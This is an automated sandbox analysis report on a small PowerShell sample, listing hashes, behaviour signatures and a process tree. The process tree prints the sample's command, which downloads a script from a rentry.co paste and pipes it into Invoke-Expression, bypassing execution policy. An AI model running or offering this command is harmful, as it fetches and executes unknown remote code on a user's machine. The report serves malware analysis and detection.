Analysis
-
max time kernel
120s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
07-07-2024 14:30
Static task
static1
Behavioral task
behavioral1
Sample
file.ps1
Resource
win7-20240704-en
General
-
Target
file.ps1
-
Size
47B
-
MD5
ba644fc1ec08acd03635e632eca767ce
-
SHA1
c43ff24b42307a56efe51fdcc90ba3f3688a83f5
-
SHA256
8fa3b77007a27683e1e3c2e59d9c46aff40df0a9f486b5dc48686ec5e4dc29a9
-
SHA512
5a0a21c01f379c82ace0cae841e83f250c0989055c4f97c1fe61374875ec618607f9184a86d77a6f1414adb55a4e560cf462e6087e49c9a72ab7ec05243f6386
Malware Config
Signatures
-
pid Process 2216 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2216 powershell.exe 592 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2216 powershell.exe Token: SeDebugPrivilege 592 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2216 wrote to memory of 592 2216 powershell.exe 32 PID 2216 wrote to memory of 592 2216 powershell.exe 32 PID 2216 wrote to memory of 592 2216 powershell.exe 32
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\file.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm " "rentry.co/0x1001/raw | iex"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:592
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD593cd894f302c402de1037e3f8bf87c05
SHA1bf03daa497a33f6810eef8bb5920b1b73e3c17c3
SHA256c20149130c20f0e4e847db9e5851e1b9c43505ebdd10c8350cfbfe4fb3ffde73
SHA51229e41ccc59714581f7c47085d81438c061bcfbfd273de4f64c715e0e3e9d0b175e5f1cf04addce4956674965f62490e2b9eccf5f1c30ea480330583a3218c6f2